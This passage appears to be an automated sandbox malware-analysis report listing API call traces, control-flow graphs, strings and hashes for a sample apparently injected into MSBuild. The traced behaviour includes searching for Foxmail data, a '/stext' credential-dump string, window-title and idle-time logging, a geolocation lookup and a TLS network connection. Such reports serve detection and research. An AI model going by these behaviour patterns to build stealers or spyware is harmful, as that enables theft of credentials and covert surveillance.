                                                                                                                                            control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b61a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b61a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b61a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1102 412019-412024 Sleep 1101->1102 1103 41200e-412010 1101->1103 1102->1078 1106 41202a-41203c call 408339 1102->1106 1103->1102 1105 412012-412017 1103->1105 1105->1102 1105->1106 1110 412092-4120b1 call 401e13 * 3 1106->1110 1111 41203e-41204c call 408339 1106->1111 1122 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1122 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1123 41205e-41208a Sleep call 401e13 * 3 1117->1123 1143 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1122->1143 1144 412274-41236b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1122->1144 1123->978 1137 412090 1123->1137 1137->1122 1213 41236f-4123db call 401eea call 401e13 call 401eea * 8 1143->1213 1144->1213 1245 4123e0-4123f6 call 401eea 1213->1245
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76E23530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                            • API String ID: 1223786279-3931108886
                                                                                                                                            • Opcode ID: 50867f7fd8278ac03888c6cbd25935d2336d67605b6c946f911f9e5deb691de1
                                                                                                                                            • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                                            • Opcode Fuzzy Hash: 50867f7fd8278ac03888c6cbd25935d2336d67605b6c946f911f9e5deb691de1
                                                                                                                                            • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                                                            Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                              • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                                                                            • API String ID: 672098462-2938083778
                                                                                                                                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                            Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                                                            • Opcode ID: 011bd7a893169c3b8833ad9f51b270e3128e7b6ab554ae5cec31d1ab042eb71a
                                                                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                                                            • Opcode Fuzzy Hash: 011bd7a893169c3b8833ad9f51b270e3128e7b6ab554ae5cec31d1ab042eb71a
                                                                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                                                            Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1384 40428c-4042ad connect 1385 4043e1-4043e5 1384->1385 1386 4042b3-4042b6 1384->1386 1389 4043e7-4043f5 WSAGetLastError 1385->1389 1390 40445f 1385->1390 1387 4043da-4043dc 1386->1387 1388 4042bc-4042bf 1386->1388 1391 404461-404465 1387->1391 1392 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1388->1392 1393 4042eb-4042f5 call 420151 1388->1393 1389->1390 1394 4043f7-4043fa 1389->1394 1390->1391 1392->1393 1404 404306-404313 call 420373 1393->1404 1405 4042f7-404301 1393->1405 1397 404439-40443e 1394->1397 1398 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1394->1398 1400 404443-40445c call 401f66 * 2 call 41a686 1397->1400 1398->1390 1400->1390 1418 404315-404338 call 401f66 * 2 call 41a686 1404->1418 1419 40434c-404357 call 420f34 1404->1419 1405->1400 1445 40433b-404347 call 420191 1418->1445 1430 404389-404396 call 4202ea 1419->1430 1431 404359-404387 call 401f66 * 2 call 41a686 call 420592 1419->1431 1441 404398-4043bb call 401f66 * 2 call 41a686 1430->1441 1442 4043be-4043d7 CreateEventW * 2 1430->1442 1431->1445 1441->1442 1442->1387 1445->1390
                                                                                                                                            APIs
                                                                                                                                            • connect.WS2_32(?,00F1A798,00000010), ref: 004042A5
                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                            • API String ID: 994465650-2151626615
                                                                                                                                            • Opcode ID: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                                            • Opcode Fuzzy Hash: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                                                            Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3658366068-0
                                                                                                                                            • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                            • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                                                            Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                            • API String ID: 911427763-3954389425
                                                                                                                                            • Opcode ID: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                            • Opcode Fuzzy Hash: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                                                            Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1556 40c89e-40c8c3 call 401e52 1559 40c8c9 1556->1559 1560 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1556->1560 1561 40c8d0-40c8d5 1559->1561 1562 40c9c2-40c9c7 1559->1562 1563 40c905-40c90a 1559->1563 1564 40c9d8 1559->1564 1565 40c9c9-40c9ce call 43ac0f 1559->1565 1566 40c8da-40c8e8 call 41a74b call 401e18 1559->1566 1567 40c8fb-40c900 1559->1567 1568 40c9bb-40c9c0 1559->1568 1569 40c90f-40c916 call 41b15b 1559->1569 1572 40c9dd-40c9e2 call 43ac0f 1561->1572 1562->1572 1563->1572 1564->1572 1576 40c9d3-40c9d6 1565->1576 1588 40c8ed 1566->1588 1567->1572 1568->1572 1585 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1569->1585 1586 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1569->1586 1581 40c9e3-40c9e8 call 4082d7 1572->1581 1576->1564 1576->1581 1581->1560 1594 40c8f1-40c8f6 call 401e13 1585->1594 1586->1588 1588->1594 1594->1560
                                                                                                                                            APIs
                                                                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongNamePath
                                                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                            • API String ID: 82841172-425784914
                                                                                                                                            • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                                            • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                                                            Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1719 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1724 41a55c-41a57d InternetReadFile 1719->1724 1725 41a5a3-41a5a6 1724->1725 1726 41a57f-41a59f call 401f86 call 402f08 call 401eea 1724->1726 1727 41a5a8-41a5aa 1725->1727 1728 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1725->1728 1726->1725 1727->1724 1727->1728 1732 41a5be-41a5c8 1728->1732
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                                            Strings
                                                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                                                            • API String ID: 3121278467-91888290
                                                                                                                                            • Opcode ID: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                            • Opcode Fuzzy Hash: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                            Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                            • API String ID: 782494840-2070987746
                                                                                                                                            • Opcode ID: 380e0d5536f16be207b79848a76edd497ebed83e63ff7fe5043507d4c2edcc5c
                                                                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                            • Opcode Fuzzy Hash: 380e0d5536f16be207b79848a76edd497ebed83e63ff7fe5043507d4c2edcc5c
                                                                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                                            Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                              • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2099061454-0
                                                                                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
